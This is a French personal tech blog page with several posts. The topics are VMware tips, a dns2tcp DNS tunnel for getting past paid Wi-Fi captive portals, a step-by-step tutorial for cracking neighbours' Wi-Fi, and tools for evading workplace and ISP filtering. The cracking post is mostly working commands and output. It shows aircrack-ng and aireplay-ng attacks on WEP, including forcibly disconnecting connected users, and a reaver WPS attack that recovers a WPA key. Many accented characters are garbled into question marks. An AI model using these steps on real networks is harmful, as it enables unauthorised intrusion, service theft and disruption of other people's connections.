SnakeNET

Utilisateur principal de ce site web.

Mar 222012
 

Si comme moi, vous utilisez un petit SSD pour stocker vos machines virtuelles, vous aurez certainement remarqu? la pr?sence dans le dossier de votre VM d’un fichier xxxxx.vmem de la taille de la RAM allou?e ? votre VM.

?a peut paraitre peu, mais dans mon cas, j’ai 6 VMs avec chacune 2-3 Go de RAM = 12-18 Go en tout. Oui, mais pareil sur le disque ! et la , ben ?a marche plus :'(

Solution… d?sactiver ce fichier…
L’auteur de cette solution : http://communities.vmware.com/message/197399#197399

Je recopie sa m?thode en fran?ais et ? ma sauce pour Windows 7 (seven)

Rendez-vous dans « C:\Users\All Users\VMware\VMware Workstation » et cr?ez-?ditez le fichier « settings.ini ». Ajoutez-y la ligne suivante :

mainMem.useNamedFile = FALSE

Je vous passe les d?tails sur comment faire en sorte que vous puissiez cr?er/modifier ce fichier… Vous ?tes cens?s ?tres aptes ? le faire…

Rappel pour les nuls : Modifier les propri?t?s NTFS du r?pertoire/fichier et ajoutez-y votre utilisateur en modification

On arr?te VMWare Workstation et ensuite, on le red?marre…

Tadaaa… plus de fichiers VMEM…

Fév 212012
 

Vous avez configur? votre machine pour utiliser plusieurs fichiers VMDK pour des disques diff?rents afin d’am?liorer la maintenance ou pour des performances. OK.
Mais, vous avez donn? les m?mes volumes a chacun de vos disques et donc, vous ne savez pas qui fait quoi (car bien sur, vous n’avez pas donn? de nom logique a vos VMDK)

Exemple:
VM
- VMDK : 20 Go
- VMDK : 20 Go
- VMDK : 20 Go
- VMDK : 20 Go

Windows:
– Disque C:\ : 20Go
– Disque D:\ : 20Go
– Disque E:\ : 20Go
– Disque F:\ : 20Go

VM Sous Windows:

  • Ouvrez le gestionnaire de disques
  • Dans la vue du bas (Disques physiques), cliquez droit sur le disque et cliquez sur « Propri?t?s »
  • Dans l’onglet « General », regardez ce qui est indiqu? dans « location ». Vous y trouverez une informations dans le style :
    Bus Number x, Target Id y, LUN z

Correspondance dans VMWare:
Vous avez donc des donn?es X, Y et Z pour vos disques. Sinon, revoyez les ?tapes pr?c?dentes.

  • Ouvrez les propri?t?s de votre VM
  • Allez sur chaque disque, et cliquez sur « Avanc? »
  • Une fenetre apparait indiquant le « Virtual Device Node » de ce disque avec comme valeurs : SCSI y:z
  • Tadaaa! ?a correspond!
  • Il vous reste a faire les modifications que vous vouliez faire, et SURTOUT:
    • Adaptez le nom de votre disque pour ne plus vous emm*** ? tout refaire

 

Fév 182012
 

Combien de fois ne vous êtes-vous pas retrouvé à vous connecter à un réseau WIFI public, et à pester sur ces @&?&@ de portail captif qui vous « invitent » a acheter à prix d’or une connexion au web?
Souvent? Alors, ce message est pour vous.

Pour passer à travers ce type de portail, vous devrez vérifier si les requêtes DNS passent.

ping www.google.be
C:\Users\Xxxxx>ping www.google.be
Envoi d'une requ?te 'ping' sur www-cctld.l.google.com [173.194.78.94] avec 32 octets de donn?es?:
R?ponse de 173.194.78.94?: octets=32 temps=36 ms TTL=47
R?ponse de 173.194.78.94?: octets=32 temps=36 ms TTL=45
R?ponse de 173.194.78.94?: octets=32 temps=38 ms TTL=47
R?ponse de 173.194.78.94?: octets=32 temps=36 ms TTL=47
Statistiques Ping pour 173.194.78.94:
??? Paquets?: envoy?s = 4, re?us = 4, perdus = 0 (perte 0%),
Dur?e approximative des boucles en millisecondes :
??? Minimum = 36ms, Maximum = 38ms, Moyenne = 36ms

Si votre PC arrive a traduire ?a en une adresse comme dans mon cas, c’est bon. Sinon, payez.

Comment pr?parer le terrain?

  • un nom de domaine qui pointe chez vous DynDNS ou No-IP sont 2 sites communs et gratuits Parmis d’autres
  • Un Linux toujours allum? et configur? sur lequel tournera :
    • le petit programme qui mettra a jour votre DNS en fonction de votre IP (Fournit par DynDNS ou No-IP)
    • Le programme DNS2TCPD
    • Un proxy (squid)

Comment configurer mon Linux?

Mise à jour de DynDNS ou No-IP

Je n’explique pas comment installer et configurer le programme de mise a jour du DNS. Suivez les indications du prestataire.

Mise en place de DNS2TCP

Sur votre serveur Linux, vous installer DNS2TCP.

wget http://www.hsc.fr/ressources/outils/dns2tcp/download/dns2tcp-0.5.2.tar.gz
tar -zxf dns2tcp-0.5.2.tar.gz
cd dns2tcp-0.5.2/
./configure
make
sudo make install

Cr?ez le fichier de configuration? /etc/dns2tcp :

listen = 127.0.0.1
port = 53
user = nobody
chroot = /tmp
domain = exemple.snakenet.eu
ressources = ssh:127.0.0.1:22
ressources = proxy:127.0.0.1:1723 

Sur votre poste, vous entrez la commande suivante:

dns2tcpc.exe -z?exemple.snakenet.eu -r ssh -l 22 -d 1 

Une fois la connexion établie, vous configurez Putty pour se connecter sur : 127.0.0.1:22
Si vous souhaitez le voir démarrer automatiquement au démarrage du PC : crontab -e

@reboot /usr/bin/dns2tcpd -f /etc/dns2tcpd.conf 

Le programme (client) permettant de se connecter?? votre proxy peux se trouver ici :

Windows : http://azertyfab.free.fr/dns2tcp/dns2tcpc.exe

Fév 142012
 

Pr?-requis :

Avoir une distribution Debian ou Ubuntu. Ces distributions ne sont pas meilleures pour le crack que les autres, mais mon tutoriel est bas? uniquement sur cette distribution.
Les commandes fonctionnent parfaitement sur d?autres distributions. La seule diff?rence, est la mani?re d?installer les d?pendances.

Droits d?acc?s

Pour la grande majorit? des commandes, vous devez ?tre ROOT pour que cela fonctionne.

Vous pouvez le devenir en tapant la commande ? su ? ? et en entrant le mot de passe de ? root ?

Installer la suite aircrack-ng (et ses d?pendances)

apt-get install libssl-dev make gcc iw

wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz
tar -zxvf aircrack-ng-1.1.tar.gz
cd aircrack-ng-1.1
make
make install

Avoir une carte wifi compatible (Realtek, RALink,…) Evitez les cartes Intel…

Tapez la commande ?iwconfig? et regardez le mat?riel Wifi install?.

root@linux-hack:~# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11bg  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=27 dBm
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
pan0      no wireless extensions.

Dans ce cas-ci, on voit que l?interface r?seau WLAN0 est une carte WIFI.

Comment v?rifier si elle est capable de passer en mode ? monitor ?

root@linux-hack:~# airmon-ng start wlan0
 Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e

PID    Name
1211   NetworkManager
1220   avahi-daemon
1223   avahi-daemon
2298   wpa_supplicant
2300   dhclient

Interface      Chipset        Driver
wlan0          RTL8187        rtl8187 - [phy0]
                              (monitor mode enabled on mon0)

Nous voyons que la carte WLAN0 est pass?e en mode monitor via la nouvelle interface r?seau ? MON0 ?

Scannez les r?seaux Wifi environnants pour trouver votre cible

airodump-ng mon0

Cette commande va vous donner la liste de tout ce qu?il trouve

CH  5 ][ Elapsed: 24 s ][ 2012-02-14 09:32

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 11:22:33:44:55:66  -36       39       30    0   9  54e. WPA  TKIP   PSK  bbox2-1234
 11:22:33:44:55:66  -35       41        0    0   9  54e. OPN              bbox2-1234
 11:22:33:44:55:66  -49       19        1    0   1  54e. OPN              bbox2-1234
 11:22:33:44:55:66  -66       14        0    0   6  54e  WPA2 CCMP   PSK  bbox2-1234
 11:22:33:44:55:66  -65       15        1    0   6  54e. WPA2 CCMP   PSK  bbox2-1234
 11:22:33:44:55:66  -67        7        0    0   1  54e. OPN              bbox2-1234
 11:22:33:44:55:66  -67       19        0    0   9  54 . WEP  WEP         bbox2-1234
 11:22:33:44:55:66  -68        5        1    0   1  54e. WPA  TKIP   PSK  bbox2-1234
 11:22:33:44:55:66  -70        4        0    0   1  54e  WPA2 CCMP   PSK  bbox2-1234
 11:22:33:44:55:66  -71        4        0    0  11  54e. WPA  TKIP   PSK  bbox2-1234
 11:22:33:44:55:66  -72        2        0    0   1  54e. WEP  WEP         bbox2-1234

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
 (not associated)   11:22:33:44:55:66  -72    0 - 1      0        2  bbox2-9999
 11:22:33:44:55:66  11:22:33:44:55:66   -9   54e-54      0        4
 11:22:33:44:55:66  11:22:33:44:55:66  -56    1e- 5      0        2

BSSID = adresse MAC de l’appareil
ESSID = nom d WIFI
STATION = Adresse MAC d’un appareil wifi connect? (pc, GSM, …)
PWR = perte de signal entre vous et la station (-40 = bien. -70 = mauvais signal)
CH = canal de communication (fr?quence)
ENC = Cryptage mis en place.

J?ai volontairement masqu? les adresses MAC et les noms des WIFI pour des raisons de s?curit?

Cracker le mot de passe d?un r?seau Wifi

Cracker un reseau OPN

Y’a pas besoin, il n’y a aucun cryptage

Cracker un r?seau WEP

Dans la suite, je vous pr?senterai plusieurs commandes. Celles-ci sont a lancer en simultan?. Ouvrez donc une fen?tre de terminal diff?rente ? chaque attaque/commande

1? Lancer airodump en mode « enregistrement des donn?es » sur la cible.

Voici les d?tails de ma cible :

BSSID                PWR  Beacons  #Data, #/s  CH    MB     ENC    CIPHER    AUTH ESSID
 11:22:33:44:55:66    -68  5        0      0    1     54e.   WEP    WEP            bbox2-1234
airodump-ng -w BIBOX --ivs -c 1 -d 11:22:33:44:55:66 mon0

Cette commande demande :

– D’?crire dans un fichier commen?ant par BIBOX
– N’?crire que les donn?es utiles pour le crack (les IVS)
– De se caler sur le canal 1 (-c 1)
– De ne filtrer que sur l’Access Point qui nous int?resse sur base de son adresse MAC (-d MAC )
– Le tout, via l’interface r?seau « mon0 »

Cette commande ne devra ?tre arr?t?e QUE quand on aura finalement crack? l’AccessPoint.

2? Ejecter tous les gens connect?s dessus afin de les forcer ? se reconnecter.

aireplay-ng -0 0 -a 11:22:33:44:55:66 mon0

-0 0 : attaque 0 ex?cut?e ind?finiment (0)
-a MAC : adresse mac de la machine que j’attaque

Arr?ter la commande apr?s un certain temps. Vous pourrez la relancer plusieurs fois si vous voulez, mais n?oubliez pas de vous r?-authentifier apr?s (point suivant)

3? S’authentifier sur le WIFI (faire croire qu’on est copains)

aireplay-ng -1 0 -e 11:22:33:44:55:66 mon0

-1 0 : attaque 1 ex?cut?e sans arr?t (0)
-e MAC : adresse mac de la machine que j’attaque

4? Faire une attaque ? ARP ?

aireplay-ng -3  -e 11:22:33:44:55:66 mon0

Cette attaque est TRES ?fficace quand quelqu?un est d?j? connect? sur le wifi.
Il vaut mieux la laisser tourner. D?s qu?elle d?marre, elle est redoutable !

5? Faire une attaque ? chop-chop ?

aireplay-ng -4  -e 11:22:33:44:55:66 mon0

6? Faire une attaque ? cofee-latte ?

aireplay-ng -6  -e 11:22:33:44:55:66 mon0

Cette attaque est efficace si quelqu?un est d?j? connect? sur le WIFI

7? cracker la clef.

C?est bien beau de sauver les IVS, de faire des attaques, de g?n?rer du traffic et tout et tout, mais on voulait quoi d?j? ? Ah oui ! cette foutue clef !

aircrack-ng *.ivs

Laissez tourner?

D?s que la clef sera trouv?e, vous pourrez arr?ter toutes les attaques ci-dessus.

Cracker du WPA

Pr?-requis :

Installer les programmes n?cessaires ainsi que leurs d?pendances

apt-get install libsqlite3-dev libpcap0.8-dev

 wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
 tar -zxf reaver-1.4.tar.gz
 cd reaver-1.4
 cd src
 ./configure
 make
 make install

Connaitre sa cible.

Voir point ci-dessus : Scannez les r?seaux Wifi environnants pour trouver votre cible

Attaquer le point WIFI

reaver -i mon0 -b 11:22:33:44:55:66

ou, si ca ne fonctionne pas (comme chez moi)

reaver -L -d 0 -i mon0 -b 11:22:33:44:55:66

La syntaxe est simple : lancer reaver sur l?interface wifi qui-va-bien avec comme param?tre l?adresse MAC du wifi cible (BSSID) (vous pouvez ajouter l?option ? ?vv ? pour le voir travailler)

Le r?sultat apparait comme par enchantement !

root@linux-hack:~# reaver -L -d 0 -i mon0 -b 11:22:33:44:55:66 -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 

[+] Waiting for beacon from 11:22:33:44:55:66[+] Switching mon0 to channel 1
[+] Associated with 11:22:33:44:55:66 (ESSID: bbox2-1234)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 12 seconds
[+] WPS PIN: '12345670'
[+] WPA PSK: 'Ceciestuntutoriel'
[+] AP SSID: 'bbox2-1234'
[+] Nothing done, nothing to save.
root@linux-hack:~#

Et voil?. 12 secondes pour du WPA. Le mot de passe apparait : ‘Ceciestuntutoriel’

Si vous voulez connaitre le vendeur d’une carte r?seau : http://www.base64online.com/mac_address.php

 

Déc 312011
 

Si comme moi, l’acc?s ? l’Internet est filtr? au boulot j’ai plusieurs solutions pour vous:

  • Le proxy HTTP
    Qui vous permet d’acc?der au contenu de presque n’importe quel site
    Proxy
  • Le client FTP
    Qui vous permet d’acc?der ? un site FTP depuis votre navigateur pr?f?r?
    FTP

Faites en bon usage!

Déc 312011
 

Si vous ne voulez pas changer vos DNS (parce que vous ?tes au boulot par exemple), vous pouvez forcer certaines adresses ? utiliser d’autres donn?es DNS.

Comment? En les mettant dans le fichier etc/hosts de votre ordinateur…

Sous Windows : %windir%\System32\drivers\etc\hosts
Sous Linux : /etc/hosts

C’est assez r?barbatif, je vous l’accorde. Je vous propose donc : BlueLifeHost editor. Un freeware qui vous permettra de changer tout cela facilement…

http://sordum.xoomsite.com/?p=3D7593

Compatibilit? :
Windows (XP, Vista, Seven)
Langues :
Anglais, Turc, Allemand, Suedois

Déc 312011
 

Votre fournisseur d’acc?s ? internet vous a brid? l’acc?s ? certains sites, jug?s innappropri?s? Qu’? cel? ne tienne, j’ai une solution : DNS Jumper (freeware)

DNS Jumper peut ?tre t?l?charg? ici: http://sordum.xoomsite.com/?p=4573

Voici quelques fonctions cl? :

  • Choisir facilement la carte r?seau
  • Choisir un serveur DNS rapide
  • Support de la ligne de commande
  • Nettoyage du cache DNS

Compatibilit? :
Windows

Langues:
Anglais, Turc, Allemand, Italien, Chinois, Vietnamien, Suedois, Hongrois, Francais, Japonais, Espanol, Russe, Portugais (br?zilien), Grec, N?erlandais, Roumain, Arabe, Indon?sien, Bulgare et Tcheque.

Déc 302011
 

Je ne parlerai pas ici de l’interface graphique de chaque distribution, il y en a de trop.

Non, je vous parlerai d’une m?thode qui fonctionne toujours : la ligne de commande..

Pr?-requis:

  1. Connaitre le nom de son interface wifi
    iwconfig
  2. Connaitre la liste des points wifi environnants
    iwlist [interface] scan

Mode op?ratoire:

  1. D?sactiver la carte pour la configurer
    ifconfig [interface] down
  2. Lui dire sur quel r?seau se connecter
    iwconfig [interface] essid [nom du wifi]